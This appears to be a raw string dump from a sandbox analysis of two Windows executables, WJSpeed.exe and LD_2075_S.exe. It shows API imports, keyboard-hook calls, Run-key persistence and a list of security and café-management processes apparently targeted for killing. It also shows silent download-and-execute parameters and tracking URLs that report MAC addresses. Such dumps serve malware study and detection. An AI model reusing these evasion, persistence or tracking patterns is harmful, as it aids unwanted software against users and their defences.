loaded</pre><pre>WUSER32.DLL</pre><pre>2.14.3.29</pre><pre>ZQPlayer.rc</pre><b>WJSpeed.exe_1928:</b><pre>.idata</pre><pre>.rdata</pre><pre>P.XW80</pre><pre>`.rsrc</pre><pre>P.XW81</pre><pre>kernel32.dll</pre><pre>Windows</pre><pre>MSWHEEL_ROLLMSG</pre><pre>MSH_WHEELSUPPORT_MSG</pre><pre>MSH_SCROLL_LINES_MSG</pre><pre>$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)</pre><pre>oleaut32.dll</pre><pre>EVariantBadIndexError</pre><pre>ssShift</pre><pre>htKeyword</pre><pre>EInvalidOperation</pre><pre>u%CNu</pre><pre>%s[%d]</pre><pre>%s_%d</pre><pre>EInvalidGraphicOperation</pre><pre>USER32.DLL</pre><pre>comctl32.dll</pre><pre>uxtheme.dll</pre><pre>OnKeyDown</pre><pre>OnKeyPress</pre><pre>OnKeyUp</pre><pre>UrlMon</pre><pre>Proportional</pre><pre>OnProgressHQC</pre><pre>Uhs%C</pre><pre>UhE%C</pre><pre>%s%s%s%s%s%s%s%s%s%s</pre><pre>IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")</pre><pre>JumpID("","%s")</pre><pre>TKeyEvent</pre><pre>TKeyPressEvent</pre><pre>HelpKeyword</pre><pre>crSQLWait</pre><pre>%s (%s)</pre><pre>imm32.dll</pre><pre>AutoHotkeys,|D</pre><pre>AutoHotkeyst|D</pre><pre>ssHotTrack</pre><pre>TWindowState</pre><pre>poProportional</pre><pre>TWMKey</pre><pre>KeyPreview</pre><pre>WindowStateX~D</pre><pre>tagMSG</pre><pre>System\CurrentControlSet\Control\Keyboard Layouts\%.8x</pre><pre>vcltest3.dll</pre><pre>User32.dll</pre><pre>%s, ClassID: %s</pre><pre>ole32.dll</pre><pre>olepro32.dll</pre><pre>getservbyport</pre><pre>WSAAsyncGetServByPort</pre><pre>WSAJoinLeaf</pre><pre>WS2_32.DLL</pre><pre>127.0.0.1</pre><pre>TIdSocketListWindows</pre><pre>TIdStackWindowsU</pre><pre>IdStackWindows</pre><pre>%s, %.2d %s %.4d %s %s</pre><pre>%s, %d %s %d %s %s</pre><pre>ftpTransfer</pre><pre>ftpReady</pre><pre>ftpAborted</pre><pre>ClientPortMin<</pre><pre>ClientPortMax</pre><pre>Port</pre><pre>EIdCanNotBindPortInRange</pre><pre>EIdInvalidPortRangeSVW</pre><pre>saUsernamePassword</pre><pre>Password<</pre><pre>Port</pre><pre>0.0.0.1</pre><pre>TIdTCPConnection</pre><pre>TIdTCPConnectionl</pre><pre>IdTCPConnection</pre><pre>EIdTCPConnectionError</pre><pre>TIdTCPClient</pre><pre>IdTCPClient</pre><pre>BoundPort</pre><pre>PortU</pre><pre>password</pre><pre>Password</pre><pre>IdHTTPHeaderInfo</pre><pre>ProxyPassword<</pre><pre>ProxyPort</pre><pre>Mozilla/3.0 (compatible; Indy Library)</pre><pre>libeay32.dll</pre><pre>ssleay32.dll</pre><pre>SSL_CTX_use_PrivateKey_file</pre><pre>SSL_CTX_use_certificate_file</pre><pre>SSL_get_peer_certificate</pre><pre>SSL_CTX_set_default_passwd_cb</pre><pre>SSL_CTX_set_default_passwd_cb_userdata</pre><pre>SSL_CTX_check_private_key</pre><pre>X509_STORE_CTX_get_current_cert</pre><pre>des_set_key</pre><pre>sslvrfFailIfNoPeerCert</pre><pre>TPasswordEvent</pre><pre>Certificate</pre><pre>RootCertFile</pre><pre>CertFile</pre><pre>KeyFile</pre><pre>OnGetPassword</pre><pre>EIdOSSLLoadingRootCertError</pre><pre>EIdOSSLLoadingCertError8PG</pre><pre>EIdOSSLLoadingKeyError</pre><pre>Uh.sG</pre><pre>CommentURL</pre><pre>TIdHTTPMethod</pre><pre>IdHTTP</pre><pre>TIdHTTPOption</pre><pre>TIdHTTPOptions</pre><pre>TIdHTTPProtocolVersion</pre><pre>TIdHTTPOnHeadersAvailable</pre><pre>TIdHTTPOnRedirectEvent</pre><pre>TIdHTTPResponse</pre><pre>TIdHTTPRequest</pre><pre>TIdHTTPProtocol</pre><pre>TIdCustomHTTP</pre><pre>TIdHTTP</pre><pre>HTTPOptions</pre><pre>EIdHTTPProtocolException</pre><pre>HTTPS</pre><pre>https</pre><pre>This request method is supported in HTTP 1.1</pre><pre>HTTP/1.0 200 OK</pre><pre>HTTP/</pre><pre>grfKeyState</pre><pre>TComTargetExecEvent</pre><pre>CmdGroup</pre><pre>nCmdID</pre><pre>nCmdexecopt</pre><pre>hhctrl.ocx</pre><pre>URLMON.DLL</pre><pre>SHDOCLC.DLL</pre><pre>IWebBrowser</pre><pre>IWebBrowserApp</pre><pre>IWebBrowser2</pre><pre>TEWBWindowSetResizable</pre><pre>TEWBWindowSetLeft</pre><pre>TEWBWindowSetTop</pre><pre>TEWBWindowSetWidth</pre><pre>TEWBWindowSetHeight</pre><pre>bstrUrlContext</pre><pre>bstrUrl</pre><pre>OnWindowSetResizable</pre><pre>OnWindowSetLeftP</pre><pre>OnWindowSetTop</pre><pre>OnWindowSetWidth</pre><pre>OnWindowSetHeight</pre><pre>rcmDefault</pre><pre>rcmDebug</pre><pre>DontExecuteScripts</pre><pre>DontExecuteJava</pre><pre>DontExecuteActiveX</pre><pre>DisableUrlIfEncodingUTF8</pre><pre>EnableUrlIfEncodingUTF8</pre><pre>CheckFontSupportsCodePage</pre><pre>DisableSubmitUrlInUTF8</pre><pre>EnableSubmitUrlInUTF8</pre><pre>lpMsg</pre><pre>PMsg</pre><pre>pguidCmdGroup</pre><pre>TTranslateUrlEvent</pre><pre>pchURLIn</pre><pre>ppchURLOut</pre><pre>CmdID</pre><pre>pszUrl</pre><pre>pszUrlContext</pre><pre>szPassWord</pre><pre>ErrorUrl</pre><pre>OptionKeyPath</pre><pre>OverrideOptionKeyPath</pre><pre>OnTranslateUrl</pre><pre>OnCommandExecD</pre><pre>'%s' is not supported.</pre><pre>WebocPopupManagement</pre><pre>ValidateNavigateUrl</pre><pre>HttpUsernamePasswordDisable</pre><pre>GetUrlDomFilePathUnencoded</pre><pre>XmlHttp</pre><pre>MAPI32.DLL</pre><pre>ftp://</pre><pre>http://</pre><pre>https://</pre><pre>AppEvents\Schemes\Apps\Explorer\Navigating\.Current</pre><pre>.Current</pre><pre>\ieframe.dll</pre><pre>\shdocvw.dll</pre><pre>\StringFileInfo\%0.4x%0.4x\%s</pre><pre>TMsgEvent</pre><pre>TKeyEventEx</pre><pre>Bypass</pre><pre>poPortrait</pre><pre>OnKeyDownx</pre><pre>0.750000</pre><pre>3333333</pre><pre>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent</pre><pre>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform</pre><pre>User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(</pre><pre>EmbeddedWB http://bsalsa.com/</pre><pre>OnActionExecute(QD</pre><pre>SysConfig.ini</pre><pre>WJHTTP</pre><pre>WJPlay.exe</pre><pre>%d.%d</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>0123456789</pre><pre>DSound.dll</pre><pre>Winmm.dll</pre><pre>Data\User2.ini</pre><pre>88888888</pre><pre>00000000</pre><pre>/DM8/DMSet.Xml</pre><pre>DMSet.Xml</pre><pre>http://www.baidu.com</pre><pre>http://update.wuji.com</pre><pre>8888-88-88</pre><pre>PlayerUpdate.exe</pre><pre>0000-00-00</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>?456789:;<=</pre><pre>!"#$%&'()* ,-./0123</pre><pre>%fMR=N</pre><pre>.sO%e</pre><pre>ah.Se.Sm</pre><pre>e{.gS</pre><pre>_%2.EC</pre><pre>W<.vV</pre><pre>AKLRUXZZjjjjjjjjmjjZZXURLK"</pre><pre>%S_dikkggggk</pre><pre>%Uagkk`F9?nA>H^</pre><pre>333333333333333333</pre><pre>33333833</pre><pre>3333339</pre><pre>3333333333333338</pre><pre>:*"*"$3338</pre><pre>33333333</pre><pre>33333333333</pre><pre>3333333333338</pre><pre>33338?383</pre><pre>333333333333</pre><pre>:*3:"$3338</pre><pre>333333333333333</pre><pre>KWindows</pre><pre>eEWB.IEConst</pre><pre>0IdHTTPHeaderInfo</pre><pre> IdTCPServer</pre><pre>IdTCPStream</pre><pre>Font.Charset</pre><pre>Font.Color</pre><pre>Font.Height</pre><pre>Font.Name</pre><pre>Font.Style</pre><pre>PrintOptions.HTMLHeader.Strings</pre><pre>PrintOptions.Orientation</pre><pre>ProxyParams.BasicAuthentication</pre><pre>ProxyParams.ProxyPort</pre><pre>Request.ContentLength</pre><pre>Request.ContentRangeEnd</pre><pre>Request.ContentRangeStart</pre><pre>Request.ContentType</pre><pre>Request.Accept</pre><pre>Request.BasicAuthentication</pre><pre>Request.UserAgent</pre><pre>7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)</pre><pre>shell32.dll</pre><pre>GetKeyboardState</pre><pre>SetViewportOrgEx</pre><pre>EnumWindows</pre><pre>advapi32.dll</pre><pre>iphlpapi.dll</pre><pre>EnumThreadWindows</pre><pre>gdi32.dll</pre><pre> %s6)/</pre><pre>%Se=\aO</pre><pre>U^.Ak</pre><pre>rÜc</pre><pre>.NIHrA</pre><pre>).hv^</pre><pre>:.nCX</pre><pre>!.iU </pre><pre>wf.Xd</pre><pre>.CD|f</pre><pre>user32.dll</pre><pre>RegDeleteKeyA</pre><pre>RegEnumKeyExA</pre><pre>DeleteUrlCacheEntry</pre><pre>UnhookWindowsHookEx</pre><pre>.esVhr</pre><pre>6.Sz}</pre><pre> SÁ</pre><pre>version.dll</pre><pre>InternetOpenUrlA</pre><pre>MapVirtualKeyA</pre><pre>GetKeyboardLayoutList</pre><pre>.JdMw</pre><pre>GetKeyState</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>GetKeyNameTextA</pre><pre>RegOpenKeyExA</pre><pre>GetWindowsDirectoryA</pre><pre>SetWindowsHookExA</pre><pre>RegCreateKeyExA</pre><pre>N|.xe</pre><pre>c&#%sW</pre><pre>0.TYh?</pre><pre>rzQ.hq</pre><pre>.NlNm</pre><pre>xN%Fp7</pre><pre>}1u.UTpY}9</pre><pre>.CoJX=</pre><pre>u.WZqh</pre><pre>,V^.jp</pre><pre>.vpsD</pre><pre><pre>)@3%s</pre><pre>0\.YNm</pre><pre>n.GZw</pre><pre>%cx$Q</pre><pre>R%c)n</pre><pre>SHFileOperationA</pre><pre>GetKeyboardType</pre><pre>GetCPInfo</pre><pre>RegQueryInfoKeyA</pre><pre>RegFlushKey</pre><pre>ShellExecuteA</pre><pre>A-i}1</pre><pre>ActivateKeyboardLayout</pre><pre>wininet.dll</pre><pre>LoadKeyboardLayoutA</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>GetKeyboardLayout</pre><pre>RegCloseKey</pre><pre>MsgWaitForMultipleObjects</pre><pre>errorUrl</pre><pre>1.0.0.0</pre><pre>JPEG error #%d</pre><pre>Error creating SSL context. Could not load root certificate.</pre><pre>Could not load certificate.#Could not load key, check password.</pre><pre>SSL status: "%s"</pre><pre>Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.</pre><pre>Command not supported.</pre><pre>Address type not supported.$Error accepting connection with SSL.</pre><pre>Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.</pre><pre>Operation now in progress.</pre><pre>Operation already in progress.</pre><pre>Socket operation on non-socket.</pre><pre>Protocol not supported.</pre><pre>Socket type not supported."Operation not supported on socket.</pre><pre>Protocol family not supported.0Address family not supported by protocol family.</pre><pre>Chunk StartedDThis authentication method is already registered with class name %s.</pre><pre>%s is not a valid service.</pre><pre>Socket Error # %d</pre><pre>%s is not a valid IP address.</pre><pre>Operation would block.</pre><pre>File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed</pre><pre>No data to read.$Can not bind in port range (%d - %d)</pre><pre>Invalid Port Range (%d - %d)</pre><pre>Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)</pre><pre>Resolving hostname %s.</pre><pre>Connecting to %s.</pre><pre>.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s</pre><pre>Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.</pre><pre>No help keyword specified.</pre><pre>Alt Clipboard does not support Icons</pre><pre>Cannot open clipboard/Menu '%s' is already being used by another form</pre><pre>No help found for %s#No context-sensitive help installed$No topic-based help system installed</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)</pre><pre>Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic</pre><pre>Unsupported clipboard format</pre><pre>$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Unable to write to %s</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre>!'%s' is not a valid integer value('%s' is not a valid floating point value</pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time</pre><pre>I/O error %d</pre><b>WJSpeed.exe_1928_rwx_00564000_00001000:</b><pre>.CD|f</pre><b>WJSpeed.exe_1928_rwx_00567000_00001000:</b><pre>user32.dll</pre><pre>RegDeleteKeyA</pre><pre>RegEnumKeyExA</pre><b>WJSpeed.exe_1928_rwx_0057C000_00002000:</b><pre>RegOpenKeyExA</pre><pre>ole32.dll</pre><pre>GetWindowsDirectoryA</pre><b>LD_2075_S.exe_1320:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>tCPh</pre><pre>>%u5V</pre><pre>PSSSSSSh</pre><pre>D$XSVSSSh</pre><pre>t98\$8u#SShx^F</pre><pre>SShd^F</pre><pre>hKey</pre><pre>tGHt.Ht&</pre><pre>%s (%s:%d)</pre><pre>%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl</pre><pre>%Program Files%</pre><pre>%Program Files% (x86)</pre><pre>Windows CE</pre><pre>Windows 7</pre><pre>Windows Vista</pre><pre>Windows 2003 Server</pre><pre>Windows XP</pre><pre>Windows 2000</pre><pre>Windows NT 4</pre><pre>Windows NT 3.51</pre><pre>Windows ME</pre><pre>Windows 98 SE</pre><pre>Windows 98 SP1</pre><pre>Windows 98</pre><pre>Windows 95 OSR2</pre><pre>Windows 95 SP1</pre><pre>Windows 95</pre><pre>unknown Windows version</pre><pre>Barclient.exe</pre><pre>ProcessSafe.exe</pre><pre>NBClient.exe</pre><pre>bkpclient.exe</pre><pre>senbksev.exe</pre><pre>mzdclient.exe</pre><pre>FrzState2k.exe</pre><pre>DF5Sevr.exe</pre><pre>yqsclient.exe</pre><pre>BarClientView.exe</pre><pre>wxplus_09.exe</pre><pre>wxsecservice.exe</pre><pre>wxprolife.wxe</pre><pre>wxprolife.exe</pre><pre>Nsdominated.exe</pre><pre>Nsdominatsd.exe</pre><pre>SSP.exe</pre><pre>d,%d,%d,-:-:-</pre><pre>c:\Program files\</pre><pre>c:\Program Files (x86)\</pre><pre>GetProcessHeap</pre><pre>ntdll.dll</pre><pre>mmcSer64.exe</pre><pre>CoolFixe64.dll</pre><pre>CoolFixe64.dbf</pre><pre>Uninst.exe</pre><pre>EXPLORER.EXE</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>IsOpenUrl</pre><pre>URLInfoAbout</pre><pre>Software\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>%suninst.exe</pre><pre>sff=%d</pre><pre>IDR_EXE</pre><pre>inflate 1.1.3 Copyright 1995-1998 Mark Adler</pre><pre>\winhlp32.exe</pre><pre><!--%s--></pre><pre>standalone="%s"</pre><pre>encoding="%s"</pre><pre>version="%s"</pre><pre>&#xX;</pre><pre></pre><pre>%s='%s'</pre><pre>%s="%s"</pre><pre>CNotSupportedException</pre><pre>hhctrl.ocx</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl</pre><pre>commctrl_DragListMsg</pre><pre>CCmdTarget</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Network</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32</pre><pre>kernel32.dll</pre><pre>%s%s.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp</pre><pre>comctl32.dll</pre><pre>comdlg32.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp</pre><pre>ole32.dll</pre><pre>user32.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>Run-Time Check Failure #%d - %s</pre><pre>ADVAPI32.DLL</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>MSPDB80.DLL</pre><pre>RegCloseKey</pre><pre>_CrtDbgReport: String too long or Invalid characters in String</pre><pre>OLEACC.dll</pre><pre>shell32.dll</pre><pre>Advapi32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CoolFixe</pre><pre>SYSTEM\CurrentControlSet\Control\Windows</pre><pre>%d-%d-%d d:d:d</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>User32.dll</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>FHKEY_CURRENT_CONFIG</pre><pre>HKEY_DYN_DATA</pre><pre>HKEY_PERFORMANCE_DATA</pre><pre>HKEY_USERS</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_CLASSES_ROOT</pre><pre>RegDeleteKeyExA</pre><pre>controler.ini</pre><pre>controler.ini error</pre><pre>http://update.zbtbd.com/download.php?version1=""&version2=""</pre><pre>copyfile.ini</pre><pre>http://int.dpool.sina.com.cn/iplookup/iplookup.php</pre><pre>%s%%%2X</pre><pre>http://php.weather.sina.com.cn/xml.php?city=%s&password=DJOYnieT8234jlsK&day=0</pre><pre>WeatherData.xml</pre><pre>http://img2.kuping.cc/mini/Public/tq/weather.php?city=%s</pre><pre>http://tj.zbtbd.com/sysdata.php?sysinstall=%s&qudaoid=%s&killlist=%s&killliston=%s&ver=%s&name=%s&status=%s</pre><pre>http://tj.zbtbd.com/maindata3.php?macid=%s&runing=%d&bootrun=%d&lmrun=%d</pre><pre>&qudaoid=%s&opentime=%s&closetime=%s&killlist=%s&killliston=%s&sysiskill=%d&ver=%s&name=%s</pre><pre>http://tj.zbtbd.com/maindata3.php?install=%s&qudaoid=%s&ver=%s&name=%s</pre><pre>http://tj.zbtbd.com/sysdata.php?firstinstall=%s&qudaoid=%s&killlist=%s&killliston=%s&ver=%s&name=%s</pre><pre>http://tj.zbtbd.com/maindata3.php?uninstall=%s&qudaoid=%s&ver=%s&name=%s</pre><pre>softset.ini</pre><pre>d,d,d,d,d,d</pre><pre>CoolFixe.exe</pre><pre>mmcSer.exe</pre><pre>CoolFixe.dll</pre><pre>CoolFixe.sys</pre><pre>http://update.zbtbd.com/tj.html?survival=%s</pre><pre>update.ini</pre><pre>ACEE0DE0-1A6B-40f0-845B-BF8A9CE31177</pre><pre>/slient callIni{%sdefaultupdate.ini} tempName{CoolFixe} downloadafile{%s} callExe{%s}</pre><pre>/slient callIni{%supdate.ini} tempName{CoolFixe} downloadafile{%s} callExe{%s}</pre><pre>City.xml</pre><pre>X:X:X:X:X:X</pre><pre>config.zbtbd.com/Public/Configs/KpUnInstall/%s.xml</pre><pre>UnInstall.xml</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\</pre><pre>Uninstall.ini</pre><pre>Field %d</pre><pre>%s%s%s91Ñ00%s</pre><pre>http://www.zbtbd.com</pre><pre>%s/index.php?s=Statistics/Index&user_id=%s&soft_id=%s</pre><pre>&mac_add=%s&type=9&sum=1&value=%d&value1=1&value2=0&value3=0</pre><pre>&key=%s</pre><pre>http://config.zbtbd.com/Public/Configs/cpas.html</pre><pre>%s?id=%s</pre><pre>&type=9&sum=1&value=%d&value1=1&value2=0&value3=0</pre><pre>%d-d-d d:d:d</pre><pre>CoolFixeIn.dll</pre><pre>%s//%s</pre><pre>http://update.zbtbd.com/tj.html?installation=%s</pre><pre>CoolFixe.dbf</pre><pre>http://update.zbtbd.com/time.php</pre><pre>%s?%ld</pre><pre>nSleepTime %d</pre><pre>application/x-www-form-urlencoded</pre><pre>HTTPS://</pre><pre>Ryeol HTTP Client Class</pre><pre>::WriteFile failed ("%s").</pre><pre>::GetFileSize failed ("%s").</pre><pre>OpenFile (::CreateFile) failed ("%s").</pre><pre>::HttpEndRequest failed.</pre><pre>::HttpSendRequestEx failed.</pre><pre>::HttpSendRequest failed.</pre><pre>::HttpAddRequestHeaders failed.</pre><pre>::HttpOpenRequest failed.</pre><pre>::HttpQueryInfo failed.</pre><pre>The file (%s) aleady exists.</pre><pre>The encoded URL is not valid.</pre><pre>The port number is not valid.</pre><pre>The requested URL is not a valid URL.</pre><pre>CHttpToolA::OpenConnection: hInternet can not be NULL.</pre><pre>CHttpToolA::OpenConnection: szServerAddr can not be NULL.</pre><pre>CHttpToolA::OpenConnection: szServerAddr can not be an empty string.</pre><pre>CHttpToolA::OpenRequest: hConnection can not be NULL.</pre><pre>CHttpToolA::OpenRequest: szObjectName can not be NULL.</pre><pre>CHttpToolA::OpenRequest: szObjectName can not be an empty string.</pre><pre>HTTP/1.1</pre><pre>CHttpToolA::AddHeader: hRequest can not be NULL.</pre><pre>CHttpToolA::AddHeader: szName can not be NULL.</pre><pre>CHttpToolA::SendRequest: hRequest can not be NULL.</pre><pre>CHttpToolA::SendRequestEx: hRequest can not be NULL.</pre><pre>CHttpEncoderA::_AnsiCharToUtf8Char: szUtf8Char and szAnsiChar can not be NULL.</pre><pre>CHttpEncoderA::UrlEncodeA: szBuff can not be NULL.</pre><pre>CHttpResponseT::GetContentLength: m_hRequest can not be NULL.</pre><pre>CHttpResponseT::ReadContent: m_hRequest can not be NULL.</pre><pre>CHttpResponseT::ReadContent: pbyBuff can not be NULL.</pre><pre>CHttpResponseT::ReadContent: cbBuff can not be zero.</pre><pre>CHttpPostStatT::FileCount: The post context is not active.</pre><pre>CHttpPostStatT::_TestStartNewEntry: The post context is not active.</pre><pre>CHttpUrlAnalyzerT::Analyze: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.</pre><pre>CHttpClientT::SetUseUtf8: It is not allowed to call this method if the POST context is active.</pre><pre>CHttpClientT::MakeGetUrl: szBuff can not be NULL.</pre><pre>CHttpClientT::OpenConnection: hInternet can not be NULL.</pre><pre>CHttpClientT::ApplyProxyAccount: hConnection can not be NULL.</pre><pre>CHttpClientT::OpenRequest: hConnection can not be NULL.</pre><pre>CHttpClientT::AddRequestHeader: hRequest can not be NULL.</pre><pre>CHttpClientT::_ReleasePostResponse: The post context is not active.</pre><pre>_UrlEncodeLen: szStr can not be NULL.</pre><pre>advapi32.dll</pre><pre>WinExec</pre><pre>GetWindowsDirectoryA</pre><pre>GetCPInfo</pre><pre>PeekNamedPipe</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>EnumWindows</pre><pre>GetKeyState</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExA</pre><pre>CreateDialogIndirectParamA</pre><pre>USER32.dll</pre><pre>SetViewportOrgEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>GDI32.dll</pre><pre>WINSPOOL.DRV</pre><pre>RegCreateKeyExA</pre><pre>RegDeleteKeyA</pre><pre>RegEnumKeyExA</pre><pre>RegQueryInfoKeyA</pre><pre>RegEnumKeyA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHFileOperationA</pre><pre>SHELL32.dll</pre><pre>SHLWAPI.dll</pre><pre>OLEAUT32.dll</pre><pre>imagehlp.dll</pre><pre>PSAPI.DLL</pre><pre>NETAPI32.dll</pre><pre>HttpOpenRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>HttpSendRequestA</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>WININET.dll</pre><pre>.?AVCCmdTarget@@</pre><pre>.PAVCException@@</pre><pre>.PAVCOleException@@</pre><pre>.PAVCObject@@</pre><pre>.PAVCMemoryException@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCInvalidArgException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.?AVCCmdUI@@</pre><pre>.PAVCArchiveException@@</pre><pre>zcÁ</pre><pre>.?AV?$CHttpClientT@VCHttpToolA@Ryeol@@VCHttpEncoderA@2@@Ryeol@@</pre><pre>.?AV?$CHttpPostStatT@VCHttpToolA@Ryeol@@@Ryeol@@</pre><pre>.?AV?$CHttpResponseT@VCHttpToolA@Ryeol@@@Ryeol@@</pre><pre>.?AV?$CHttpClientMapT@VCHttpToolA@Ryeol@@@Ryeol@@</pre><pre>.?AVhttpclientexceptionA@Ryeol@@</pre><pre>.?AVerrmsg_exceptionA@Ryeol@@</pre><pre>.?AUDWebBrowserEvents2@@</pre><pre>%Program Files%\vsgrtaho\hzsoft\LD_2075_S.exe</pre><pre>2013-4-15 06:51:01</pre><pre>exe=dd_calendar.exe</pre><pre>wKey=97</pre><pre>wKey=98</pre><pre>wKey=99</pre><pre>wKey=100</pre><pre>wKey=39</pre><pre>wKey=37</pre><pre>wKey=40[copyfile]</pre><pre>=*{1;={= =</pre><pre>ÞyI</pre><pre>az9[%c</pre><pre>'ô!</pre><pre>z&g-%x</pre><pre>}K1%d</pre><pre>.Mq3u</pre><pre>.IhQiF</pre><pre>w.ksk</pre><pre>.OTSbs</pre><pre><NC><pre>.HtruT</pre><pre>%xJC[&</pre><pre>N.DnD</pre><pre>;D"M%FM</pre><pre>]%.hv</pre><pre>5u.KMC1/</pre><pre>l%C};</pre><pre>.XPo_s</pre><pre>.NJG2</pre><pre>F7g.ET</pre><pre>=[.mq</pre><pre>\,%3x</pre><pre>dM%U<</pre><pre>^T.rw</pre><pre>.GV ;</pre><pre>N %DMb</pre><pre>J.UYIn</pre><pre>Ggz.UK</pre><pre>:J.Ux</pre><pre>f9 .Se</pre><pre>za;%f</pre><pre>k|%XJc</pre><pre>_-E%xHO</pre><pre>].bG"</pre><pre>A.zrxv</pre><pre>/.yjq</pre><pre>@%DS;</pre><pre>Ë!=8</pre><pre>R.jLMC</pre><pre>\\z.GR</pre><pre>B.HMo</pre><pre>E.LRV</pre><pre>] -H}</pre><pre>k.RSD</pre><pre>%x'E1</pre><pre>bP].yWYB</pre><pre>.cvlcY"</pre><pre>.NKX=</pre><pre>.oM 